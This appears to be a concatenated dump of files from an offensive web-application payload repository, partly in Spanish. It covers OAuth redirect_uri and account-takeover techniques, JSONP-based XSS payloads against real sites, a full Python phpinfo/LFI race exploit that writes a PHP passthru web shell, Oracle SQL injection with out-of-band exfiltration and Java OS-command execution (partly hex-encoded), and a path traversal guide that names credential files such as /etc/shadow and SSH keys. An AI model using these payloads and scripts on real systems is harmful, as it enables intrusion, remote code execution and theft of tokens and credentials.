I hope they going to implement a dialog warning for same origin requests too. 136 | -------------------------------------------------------------------------------- /Web Application/0Auth 2.0/README.md: -------------------------------------------------------------------------------- 1 | # OAuth 2.0 2 | 3 | *** 4 | 5 | ## Summary 6 | - [Bypass de Autenticación a través de Implicit Grant Type](#bypass-de-autenticacion-a-traves-de-implicit-grant-type) 7 | - [Endpoints con Información Sensible](#endpoints-con-informacion-sensible) 8 | - [Vinculación Forzada de Perfiles OAuth](#vinculacion-forzada-de-perfiles-0auth) 9 | - [Account Take Over con "redirect_uri"](#account-take-over-con-redirecturi) 10 | - [Bypass "redirect_uri 01"](#bypass-redirecturi01) 11 | - [Bypass "redirect_uri 02"](#bypass-redirecturi02) 12 | - [Robar Tokens de Acceso con openRedirect](#robar-tokens-de-acceso-con-openredirect) 13 | - [Iframe, postMessage() y window.location.href(\*)](#iframe-postmessage-y-windowslocationhref*) 14 | 15 | *** 16 | 17 | ## Bypass de Autenticación a través de Implicit Grant Type 18 | 19 | Interceptar la request `/authenticate` y cambiar el valor correspondiente al parámetro que se envía, por el de otro usuario válido (e.g.: `test@test.net` --> `carlos@carlos-montoya.net`): 20 | ``` 21 | POST /authenticate HTTP/1.1 22 | Host: [proveedorOAUTH] 23 | Cookie: session=RTNhdbNYvS41LuseC7SIhX0m1f4AxYmM 24 | 25 | { 26 | "email":"carlos@carlos-montoya.net", 27 | "username":"wiener", 28 | "token":"8vHFVoNGFiI9pD0nvJ6emJW2iZB-VM6SiBuuBDtdYC8" 29 | } 30 | ``` 31 | 32 | *** 33 | 34 | ## Endpoints con Información Sensible 35 | 36 | Dan información para poder testear si es posible registrar una aplicación cliente maliciosa: 37 | ``` 38 | /.well-known/oauth-authorization-server 39 | /.well-known/openid-configuration 40 | ``` 41 | 42 | *** 43 | 44 | ## Vinculación Forzada de Perfiles OAuth 45 | 46 | 1. Iniciar sesión con credenciales comunes. 47 | 2. Cerrar sesión. 48 | 3. Relogearse (esta vez sin credenciales, ya que la aplicación debería guardar el previo login) y adjuntar perfil de RR.SS. con BurpSuite activo. 49 | 4. Interceptar la request que presente `oauth-linking`: 50 | 51 | ``` 52 | GET /auth?client_id=x3ywm971gmk1p5xowwqjl&redirect_uri=https://[appCliente]/oauth-linking&response_type=code&scope=openid%20profile%20email HTTP/1.1 53 | 54 | Host: [proveedorOAUTH] 55 | ``` 56 | 57 | 5. Verificar que no contenga el parámetro `state`. 58 | 6. Adjuntar RR.SS. de nuevo y buscar la request: 59 | 60 | ``` 61 | GET /oauth-linking?code=[...] 62 | ``` 63 | 64 | 7. Copiar URL y rechazar la request para conservar el código. 65 | 8. Elaborar ataque a víctima 66 | 67 | ## Account Take Over con "redirect_uri" 68 | 69 | Iniciar sesión y buscar la request: 70 | ``` 71 | GET /auth?client_id=x3ywm971gmk1p5xowwqjl&redirect_uri=https://[appCliente]/oauth-linking&response_type=code&scope=openid%20profile%20email HTTP/1.1 72 | 73 | Host: [proveedorOAUTH] 74 | ``` 75 | 76 | Cambiar `redirect_uri` a: 77 | 78 | ``` 79 | redirect_uri=https://YOUR-EXPLOIT-SERVER-ID/ 80 | ``` 81 | 82 | *** 83 | 84 | ## Bypass "redirect_uri 01" 85 | ``` 86 | redirect_uri=https://default-host.com &@foo.evil-user.net#@bar.evil-user.net/ 87 | ``` 88 | ``` 89 | redirect_uri=https://localhost.evil-user.net/ 90 | ``` 91 | ``` 92 | https://oauth-authorization-server.com/?client_id=123&redirect_uri=client-app.com/callback&response_mode=query 93 | ``` 94 | ``` 95 | https://oauth-authorization-server.com/?client_id=123&redirect_uri=client-app.com/callback&response_mode=fragment 96 | ``` 97 | ``` 98 | https://oauth-authorization-server.com/?client_id=123&redirect_uri=client-app.com/callback&redirect_uri=evil-user.net 99 | ``` 100 | 101 | *** 102 | 103 | ## Bypass "redirect_uri 02" 104 | 105 | Otra forma interesante de bypassear este parámetro es utilizando `fallback_redirect_uri`, siempre y cuando las condiciones en los parámetros anteriores a este se cumplan: 106 | 107 | Si la petición se ve similar a la siguiente y no es posible un bypass: 108 | ``` 109 | https://m.facebook.com/v3.3/dialog/oauth?app_id=124024574287414 110 | &redirect_uri=https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46%23origin=https://www.instagram.com/%26relation=opener 111 | &response_type=token,signed_request 112 | &scope=public_profile,email 113 | ``` 114 | 115 | Intentar con fallback_redirect_uri`: 116 | ``` 117 | https://m.facebook.com/v3.3/dialog/oauth?app_id=124024574287414 118 | &redirect_uri=https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46%23origin=https://www.instagram.com/%26relation=opener 119 | &response_type=token,signed_request 120 | &scope=public_profile,email 121 | &fallback_redirect_uri=https://www.instagram.com/ 122 | ``` 123 | 124 | La anterior request redirigiría a una URL seleccionada en `fallback_redirect_uri` en caso de que el dominio de la URL dentro de `fallback_redirect_url` sea el mismo que un sitio web incluido en la lista blanca de la aplicación y si se cumplen todas las condiciones verdaderas. Se ejecutá y se realizá una redirección a la URL seleccionada en `fallback_redirect_uri` con el `código/access_token` de Facebook incrustado en la parte del fragmento de la URL. 125 | 126 | Para explotar esta falla, es necesario tener una vulnerabilidad de `Open Redirect` en el dominio, ya que el parámetro `fallback_redirect_uri` también debería aceptar WhiteList como parte de la redirección. 127 | 128 | *** 129 | 130 | ## Robar Tokens de Acceso con openRedirect 131 | 132 | Cambiar `redirect_uri` a: 133 | ``` 134 | redirect_uri=https://client-app.com/oauth/callback/../../path/dentro/de/aplicacion 135 | ``` 136 | 137 | Luego debe conseguir un OpenRedirect para explotación. 138 | 139 | *** 140 | 141 | ## Iframe, postMessage() y window.location.href(*) 142 | 143 | 1. Buscar alguna sección de comentarios que se ejecute bajo la etiqueta `iframe`. 144 | 2. Mirar su atributo `src=[seguirURL]`. 145 | 3. Validar que se implemente `postMessage()` con `window.location.href(\*)`, es decir, hacia cualquier origen. 146 | 4. Evaluar posible explotación 147 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/jsonp_endpoint.txt: -------------------------------------------------------------------------------- 1 | #Google.com: 2 | "><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script> 3 | "><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script> 4 | "><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script> 5 | "><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script> 6 | #Blogger.com: 7 | "><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script> 8 | #Yandex: 9 | "><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script> 10 | "><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script> 11 | #VK.com: 12 | "><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script> 13 | #Marketo.com 14 | "><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script> 15 | "><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script> 16 | #AlibabaGroup: 17 | "><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script> 18 | "><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script> 19 | "><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script> 20 | "><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script> 21 | "><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script> 22 | "><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script> 23 | "><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script> 24 | #Uber.com: 25 | "><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script> 26 | #AOL/Yahoo 27 | "><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script> 28 | "><script+src="https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)"></script> 29 | "><script+src="https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-"></script> 30 | "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script> 31 | "><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script> 32 | "><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script> 33 | "><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script> 34 | "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script> 35 | "><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script> 36 | "><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script> 37 | #Twitter.com: 38 | "><script+src="http://search.twitter.com/trends.json?callback=alert()"></script> 39 | "><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script> 40 | "><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script> 41 | #Others: 42 | "><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script> 43 | "><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script> 44 | "><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script> 45 | "><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script> 46 | "><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script> 47 | "><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script> 48 | "><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script> 49 | "><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script> 50 | "><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script> 51 | "><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script> 52 | "><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script> 53 | "><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script> 54 | #GoogleAPI's 55 | "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always> 56 | "><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script> 57 | ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script> -------------------------------------------------------------------------------- /Web Application/LFI and RFI/phpinfolfi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf 3 | from __future__ import print_function 4 | from builtins import range 5 | import sys 6 | import threading 7 | import socket 8 | 9 | def setup(host, port): 10 | TAG="Security Test" 11 | PAYLOAD="""%s\r 12 | <?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG 13 | REQ1_DATA="""-----------------------------7dbff1ded0714\r 14 | Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r 15 | Content-Type: text/plain\r 16 | \r 17 | %s 18 | -----------------------------7dbff1ded0714--\r""" % PAYLOAD 19 | padding="A" * 5000 20 | REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r 21 | Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r 22 | HTTP_ACCEPT: """ + padding + """\r 23 | HTTP_USER_AGENT: """+padding+"""\r 24 | HTTP_ACCEPT_LANGUAGE: """+padding+"""\r 25 | HTTP_PRAGMA: """+padding+"""\r 26 | Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r 27 | Content-Length: %s\r 28 | Host: %s\r 29 | \r 30 | %s""" %(len(REQ1_DATA),host,REQ1_DATA) 31 | #modify this to suit the LFI script 32 | LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r 33 | User-Agent: Mozilla/4.0\r 34 | Proxy-Connection: Keep-Alive\r 35 | Host: %s\r 36 | \r 37 | \r 38 | """ 39 | return (REQ1, TAG, LFIREQ) 40 | 41 | def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): 42 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 44 | 45 | s.connect((host, port)) 46 | s2.connect((host, port)) 47 | 48 | s.send(phpinforeq) 49 | d = "" 50 | while len(d) < offset: 51 | d += s.recv(offset) 52 | try: 53 | i = d.index("[tmp_name] =>") 54 | fn = d[i+17:i+31] 55 | except ValueError: 56 | return None 57 | 58 | s2.send(lfireq % (fn, host)) 59 | d = s2.recv(4096) 60 | s.close() 61 | s2.close() 62 | 63 | if d.find(tag) != -1: 64 | return fn 65 | 66 | counter=0 67 | class ThreadWorker(threading.Thread): 68 | def __init__(self, e, l, m, *args): 69 | threading.Thread.__init__(self) 70 | self.event = e 71 | self.lock = l 72 | self.maxattempts = m 73 | self.args = args 74 | 75 | def run(self): 76 | global counter 77 | while not self.event.is_set(): 78 | with self.lock: 79 | if counter >= self.maxattempts: 80 | return 81 | counter+=1 82 | 83 | try: 84 | x = phpInfoLFI(*self.args) 85 | if self.event.is_set(): 86 | break 87 | if x: 88 | print("\nGot it! Shell created in /tmp/g") 89 | self.event.set() 90 | 91 | except socket.error: 92 | return 93 | 94 | 95 | def getOffset(host, port, phpinforeq): 96 | """Gets offset of tmp_name in the php output""" 97 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 98 | s.connect((host,port)) 99 | s.send(phpinforeq) 100 | 101 | d = "" 102 | while True: 103 | i = s.recv(4096) 104 | d+=i 105 | if i == "": 106 | break 107 | # detect the final chunk 108 | if i.endswith("0\r\n\r\n"): 109 | break 110 | s.close() 111 | i = d.find("[tmp_name] =>") 112 | if i == -1: 113 | raise ValueError("No php tmp_name in phpinfo output") 114 | 115 | print("found %s at %i" % (d[i:i+10],i)) 116 | # padded up a bit 117 | return i+256 118 | 119 | def main(): 120 | 121 | print("LFI With PHPInfo()") 122 | print("-=" * 30) 123 | 124 | if len(sys.argv) < 2: 125 | print("Usage: %s host [port] [threads]" % sys.argv[0]) 126 | sys.exit(1) 127 | 128 | try: 129 | host = socket.gethostbyname(sys.argv[1]) 130 | except socket.error as e: 131 | print("Error with hostname %s: %s" % (sys.argv[1], e)) 132 | sys.exit(1) 133 | 134 | port=80 135 | try: 136 | port = int(sys.argv[2]) 137 | except IndexError: 138 | pass 139 | except ValueError as e: 140 | print("Error with port %d: %s" % (sys.argv[2], e)) 141 | sys.exit(1) 142 | 143 | poolsz=10 144 | try: 145 | poolsz = int(sys.argv[3]) 146 | except IndexError: 147 | pass 148 | except ValueError as e: 149 | print("Error with poolsz %d: %s" % (sys.argv[3], e)) 150 | sys.exit(1) 151 | 152 | print("Getting initial offset...", end=' ') 153 | reqphp, tag, reqlfi = setup(host, port) 154 | offset = getOffset(host, port, reqphp) 155 | sys.stdout.flush() 156 | 157 | maxattempts = 1000 158 | e = threading.Event() 159 | l = threading.Lock() 160 | 161 | print("Spawning worker pool (%d)..." % poolsz) 162 | sys.stdout.flush() 163 | 164 | tp = [] 165 | for i in range(0,poolsz): 166 | tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) 167 | 168 | for t in tp: 169 | t.start() 170 | try: 171 | while not e.wait(1): 172 | if e.is_set(): 173 | break 174 | with l: 175 | sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) 176 | sys.stdout.flush() 177 | if counter >= maxattempts: 178 | break 179 | print() 180 | if e.is_set(): 181 | print("Woot! \m/") 182 | else: 183 | print(":(") 184 | except KeyboardInterrupt: 185 | print("\nTelling threads to shutdown...") 186 | e.set() 187 | 188 | print("Shuttin' down...") 189 | for t in tp: 190 | t.join() 191 | 192 | if __name__=="__main__": 193 | print("Don't forget to modify the LFI URL") 194 | main() 195 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/OracleSQL Injection.md: -------------------------------------------------------------------------------- 1 | # Oracle SQL Injection 2 | 3 | ## Summary 4 | 5 | * [Oracle SQL version](#oracle-sql-version) 6 | * [Oracle SQL database name](#oracle-sql-database-name) 7 | * [Oracle SQL List databases](#oracle-sql-list-databases) 8 | * [Oracle SQL List columns](#oracle-sql-list-columns) 9 | * [Oracle SQL List tables](#oracle-sql-list-tables) 10 | * [Oracle SQL Error Based](#oracle-sql-error-based) 11 | * [Oracle SQL Blind](#oracle-sql-blind) 12 | * [Oracle SQL Time Based](#oracle-sql-time-based) 13 | * [Oracle Out of Band](#oracle-out-of-band) 14 | * [Oracle SQL Command execution](#oracle-sql-command-execution) 15 | * [References](#references) 16 | 17 | ## Oracle SQL version 18 | 19 | ```sql 20 | SELECT user FROM dual UNION SELECT * FROM v$version 21 | ``` 22 | 23 | ## Oracle SQL database name 24 | 25 | ```sql 26 | SELECT global_name FROM global_name; 27 | SELECT name FROM V$DATABASE; 28 | SELECT instance_name FROM V$INSTANCE; 29 | SELECT SYS.DATABASE_NAME FROM DUAL; 30 | ``` 31 | 32 | ## Oracle SQL List Databases 33 | 34 | ```sql 35 | SELECT DISTINCT owner FROM all_tables; 36 | ``` 37 | 38 | ## Oracle SQL List Columns 39 | 40 | ```sql 41 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; 42 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; 43 | ``` 44 | 45 | ## Oracle SQL List Tables 46 | 47 | ```sql 48 | SELECT table_name FROM all_tables; 49 | SELECT owner, table_name FROM all_tables; 50 | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; 51 | ``` 52 | 53 | ## Oracle SQL Error based 54 | 55 | | Description | Query | 56 | | :------------- | :------------- | 57 | | Invalid HTTP Request | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual | 58 | | CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual | 59 | | Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual | 60 | | Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual | 61 | | Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users | 62 | 63 | ## Oracle SQL Blind 64 | 65 | | Description | Query | 66 | | :------------- | :------------- | 67 | | Version is 12.2 | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; | 68 | | Subselect is enabled | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) | 69 | | Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); | 70 | | Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; | 71 | | First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; | 72 | 73 | ## Oracle SQL Time based 74 | 75 | ```sql 76 | AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/ 77 | ``` 78 | 79 | ## Oracle Out of Band 80 | 81 | ```powershell 82 | '+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//x.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual-- 83 | ``` 84 | ```powershell 85 | SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')-- 86 | ``` 87 | 88 | 89 | ## Oracle SQL Command execution 90 | 91 | ```sql 92 | /* create Java class */ 93 | BEGIN 94 | EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; 95 | END; 96 | / 97 | 98 | BEGIN 99 | EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';'; 100 | END; 101 | / 102 | 103 | /* run OS command */ 104 | SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; 105 | ``` 106 | 107 | or (hex encoded) 108 | 109 | ```sql 110 | /* create Java class */ 111 | SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d'')); 112 | EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual 113 | 114 | /* run OS command */ 115 | SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; 116 | ``` 117 | -------------------------------------------------------------------------------- /Web Application/Directory Traversal/README.md: -------------------------------------------------------------------------------- 1 | # Directory traversal 2 | 3 | A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Basic exploitation](#basic-exploitation) 9 | * [16 bits Unicode encoding](#16-bits-unicode-encoding) 10 | * [UTF-8 Unicode encoding](#utf-8-unicode-encoding) 11 | * [Bypass "../" replaced by ""](#bypass--replaced-by-) 12 | * [Bypass "../" with ";"](#bypass--with-) 13 | * [Double URL encoding](#double-url-encoding) 14 | * [UNC Bypass](#unc-bypass) 15 | * [NGINX/ALB Bypass](#nginxalb-bypass) 16 | * [Path Traversal](#path-traversal) 17 | * [Interesting Linux files](#interesting-linux-files) 18 | * [Interesting Windows files](#interesting-windows-files) 19 | 20 | 21 | ## Tools 22 | 23 | - [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) 24 | ```powershell 25 | git clone https://github.com/wireghoul/dotdotpwn 26 | perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b 27 | ``` 28 | 29 | ## Basic exploitation 30 | 31 | We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter. 32 | 33 | ```powershell 34 | ../ 35 | ..\ 36 | ..\/ 37 | %2e%2e%2f 38 | %252e%252e%252f 39 | %c0%ae%c0%ae%c0%af 40 | %uff0e%uff0e%u2215 41 | %uff0e%uff0e%u2216 42 | ``` 43 | 44 | Classic Exploitation 45 | ``` 46 | https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini 47 | ``` 48 | 49 | Bypass Blocked with Absolute Path 50 | ``` 51 | GET /image?filename=/etc/passwd 52 | ``` 53 | 54 | Bypass Traversal Sequences Stripped Non-Recursively 55 | ``` 56 | GET /image?filename=....//....//....//....//....//....//etc/passwd 57 | ``` 58 | 59 | Bypass with Superfluous URL-decode 60 | ``` 61 | GET /image?filename=..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 62 | ``` 63 | 64 | Bypass Validation of Start of Path 65 | ``` 66 | GET /image?filename=/var/www/images/../../../../../../etc/passwd 67 | ``` 68 | 69 | Bypass Validation of File Extension with Null Byte (%00) 70 | ``` 71 | GET /image?filename=../../../../../../../etc/passwd%00.jpg 72 | ``` 73 | 74 | ### 16 bits Unicode encoding 75 | 76 | ```powershell 77 | . = %u002e 78 | / = %u2215 79 | \ = %u2216 80 | ``` 81 | 82 | ### UTF-8 Unicode encoding 83 | 84 | ```powershell 85 | . = %c0%2e, %e0%40%ae, %c0ae 86 | / = %c0%af, %e0%80%af, %c0%2f 87 | \ = %c0%5c, %c0%80%5c 88 | ``` 89 | 90 | ### Bypass "../" replaced by "" 91 | Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them. 92 | 93 | ```powershell 94 | ..././ 95 | ...\.\ 96 | ``` 97 | 98 | ### Bypass "../" with ";" 99 | 100 | ```powershell 101 | ..;/ 102 | http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 103 | ``` 104 | 105 | ### Double URL encoding 106 | 107 | ```powershell 108 | . = %252e 109 | / = %252f 110 | \ = %255c 111 | ``` 112 | 113 | **e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini` 114 | 115 | ### UNC Bypass 116 | 117 | An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file. 118 | 119 | ```powershell 120 | \\localhost\c$\windows\win.ini 121 | ``` 122 | 123 | ### NGINX/ALB Bypass 124 | 125 | NGINX in certain configurations and ALB can block traversal attacks in the route, For example: 126 | ```http://nginx-server/../../``` will return a 400 bad request. 127 | 128 | To bypass this behaviour just add forward slashes in front of the url: 129 | ```http://nginx-server////////../../``` 130 | 131 | 132 | ## Path Traversal 133 | 134 | ### Interesting Linux files 135 | 136 | ```powershell 137 | /etc/issue 138 | /etc/passwd 139 | /etc/shadow 140 | /etc/group 141 | /etc/hosts 142 | /etc/motd 143 | /etc/mysql/my.cnf 144 | /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) 145 | /proc/self/environ 146 | /proc/version 147 | /proc/cmdline 148 | /proc/sched_debug 149 | /proc/mounts 150 | /proc/net/arp 151 | /proc/net/route 152 | /proc/net/tcp 153 | /proc/net/udp 154 | /proc/self/cwd/index.php 155 | /proc/self/cwd/main.py 156 | /home/$USER/.bash_history 157 | /home/$USER/.ssh/id_rsa 158 | /var/run/secrets/kubernetes.io/serviceaccount 159 | /var/lib/mlocate/mlocate.db 160 | /var/lib/mlocate.db 161 | ``` 162 | 163 | ### Interesting Windows files 164 | 165 | Always existing file in recent Windows machine. 166 | Ideal to test path traversal but nothing much interesting inside... 167 | 168 | ```powershell 169 | c:\windows\system32\license.rtf 170 | c:\windows\system32\eula.txt 171 | ``` 172 | 173 | Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) 174 | 175 | ```powershell 176 | c:/boot.ini 177 | c:/inetpub/logs/logfiles 178 | c:/inetpub/wwwroot/global.asa 179 | c:/inetpub/wwwroot/index.asp 180 | c:/inetpub/wwwroot/web.config 181 | c:/sysprep.inf 182 | c:/sysprep.xml 183 | c:/sysprep/sysprep.inf 184 | c:/sysprep/sysprep.xml 185 | c:/system32/inetsrv/metabase.xml 186 | c:/sysprep.inf 187 | c:/sysprep.xml 188 | c:/sysprep/sysprep.inf 189 | c:/sysprep/sysprep.xml 190 | c:/system volume information/wpsettings.dat 191 | c:/system32/inetsrv/metabase.xml 192 | c:/unattend.txt 193 | c:/unattend.xml 194 | c:/unattended.txt 195 | 